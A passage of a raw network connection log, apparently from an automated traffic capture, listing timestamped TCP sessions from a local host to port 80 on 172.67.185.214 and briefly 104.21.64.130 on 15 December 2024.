Dec 15, 2024 04:18:28.796593904 CET	49869	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.916791916 CET	80	49864	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:28.916814089 CET	80	49869	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:28.917104006 CET	49869	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.917248964 CET	49864	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.917387009 CET	49869	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.936163902 CET	49869	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:28.936966896 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.037647963 CET	80	49869	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.057290077 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.057485104 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.057534933 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.063411951 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.098845005 CET	80	49869	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.177653074 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.183291912 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.183373928 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.183662891 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.304183006 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.404510975 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.524543047 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.524629116 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.529284954 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:29.649641037 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.649684906 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.649715900 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.810944080 CET	80	49869	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:29.811268091 CET	49869	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.143376112 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.185429096 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.270271063 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.326030970 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.388716936 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.435556889 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.516575098 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.560406923 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.708750963 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.763725996 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.823328972 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.823345900 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.823997974 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.945764065 CET	80	49870	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.945806980 CET	80	49871	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.945841074 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:30.945879936 CET	49870	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.946003914 CET	49871	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.946012974 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:30.946252108 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:31.066525936 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:31.294955015 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:31.415488005 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:31.415529013 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:31.415584087 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:32.031774998 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:32.076069117 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.476532936 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:32.529242039 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.613151073 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.614232063 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.733354092 CET	80	49877	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:32.733442068 CET	49877	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.734131098 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:32.734214067 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.734368086 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:32.854091883 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:33.091995001 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:33.212538958 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:33.212582111 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:33.212611914 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:33.822545052 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:33.872982025 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.054956913 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.107485056 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.189048052 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.190840006 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.191795111 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.311431885 CET	80	49879	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.311733961 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.311927080 CET	49879	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.312232018 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.312407970 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.432647943 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.671241999 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:34.791866064 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.791907072 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:34.791920900 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.398432970 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.405555964 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.406084061 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.526597023 CET	80	49884	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.526647091 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.526830912 CET	49884	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.527137041 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.527218103 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.530049086 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.647224903 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.649902105 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.649991989 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.650115967 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.770226955 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.873272896 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:35.993491888 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.993746042 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:35.998095989 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:36.118376970 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.118419886 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.118432045 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.613465071 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.654619932 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:36.738423109 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.779401064 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:36.846963882 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:36.888689995 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:36.982558966 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.029473066 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.109606981 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.109704971 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.110585928 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.230559111 CET	80	49891	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.230602026 CET	80	49890	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.230635881 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.230829000 CET	49891	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.230837107 CET	49890	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.230854988 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.230973005 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.350914955 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.576242924 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:37.696753025 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.696793079 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:37.696821928 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:38.317275047 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:38.373192072 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.565881014 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:38.566513062 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.687345982 CET	80	49897	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:38.687424898 CET	49897	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.687611103 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.807663918 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:38.807885885 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.812721014 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:38.933033943 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:39.170049906 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:39.290666103 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:39.290709019 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:39.290739059 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:39.894788027 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:39.935437918 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.127579927 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.170056105 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.249562979 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.250349045 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.370606899 CET	80	49899	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.370651960 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.370852947 CET	49899	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.371148109 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.371284008 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.491381884 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.716929913 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:40.908873081 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.908925056 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:40.908938885 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.462100029 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.513556004 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.709382057 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.763700008 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.845788002 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.846556902 CET	49909	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.858706951 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.858795881 CET	49909	80	192.168.2.4	104.21.64.130
Dec 15, 2024 04:18:41.967046022 CET	80	49904	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.967751980 CET	80	49909	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.968012094 CET	49909	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.968050957 CET	49904	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.979068995 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:41.979110956 CET	80	49909	104.21.64.130	192.168.2.4
Dec 15, 2024 04:18:41.979300022 CET	49909	80	192.168.2.4	104.21.64.130
Dec 15, 2024 04:18:41.979340076 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:41.979564905 CET	49909	80	192.168.2.4	104.21.64.130
Dec 15, 2024 04:18:41.979728937 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.099783897 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.113518953 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.233896017 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.234488964 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.234488964 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.326411009 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.354829073 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.446669102 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.446711063 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.592133045 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:42.713162899 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.713210106 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:42.713238955 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.064153910 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.107351065 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.317318916 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.321604967 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.372977972 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.374165058 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.567826033 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.623014927 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.683331013 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.683469057 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.684135914 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.803561926 CET	80	49910	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.803674936 CET	49910	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.803850889 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.804050922 CET	80	49912	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:43.804132938 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.804210901 CET	49912	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.804250956 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:43.924232960 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:44.154495955 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:44.274548054 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:44.274589062 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:44.274625063 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:44.959680080 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.013576984 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.205066919 CET	80	49917	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.248049021 CET	49917	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.383016109 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.502880096 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.502959967 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.503062963 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.622839928 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.857398987 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:45.977603912 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.977693081 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:45.977722883 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:46.590152979 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:46.638542891 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:46.822841883 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:46.873102903 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:46.946696997 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:46.947343111 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:47.067559958 CET	80	49920	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:47.067605019 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:47.067764997 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:47.067856073 CET	49920	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:47.068002939 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:47.188168049 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:47.420629025 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:47.541033030 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:47.541075945 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:47.541105032 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.153503895 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.201284885 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.326932907 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.327394962 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.397249937 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.397480011 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.447670937 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.447693110 CET	80	49925	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.447802067 CET	49925	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.447938919 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.448355913 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.448667049 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.568077087 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.568448067 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.568548918 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.568702936 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.688643932 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.795047998 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:48.915527105 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.915581942 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:48.920243025 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:49.040666103 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.040709972 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.040740013 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.565361023 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.607306957 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:49.743490934 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.794804096 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:49.804693937 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:49.857495070 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:49.978723049 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.029181957 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.112739086 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.112740993 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.113363028 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.232940912 CET	80	49931	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.233093977 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.233177900 CET	49931	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.233242989 CET	80	49930	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.233325958 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.233340979 CET	49930	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.238143921 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.357846975 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.591787100 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:50.712373018 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.712415934 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:50.712446928 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:51.318840027 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:51.372926950 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:51.550719023 CET	80	49935	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:51.591670990 CET	49935	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:51.679511070 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:51.799468994 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:51.799540997 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:51.799701929 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:51.919441938 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:52.154330969 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:52.274662971 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:52.274681091 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:52.274693966 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:52.906717062 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:52.952436924 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.151343107 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.201069117 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.280718088 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.281580925 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.401865005 CET	80	49939	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.401926994 CET	49939	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.402008057 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.402075052 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.402316093 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.522172928 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.748061895 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:53.867844105 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.867866993 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:53.867882013 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.487819910 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.529361010 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.723000050 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.764465094 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.811079025 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.812243938 CET	49949	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.848701000 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.931101084 CET	80	49945	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.931958914 CET	80	49949	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.932094097 CET	49949	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.932142019 CET	49945	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.968755960 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:54.972892046 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:54.973053932 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:55.092797041 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:55.326230049 CET	49950	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:18:55.446491957 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:55.446513891 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:55.446527004 CET	80	49950	172.67.185.214	192.168.2.4
Dec 15, 2024 04:18:56.142858982 CET	80	49950	172.67.185.214	192.168.2.4
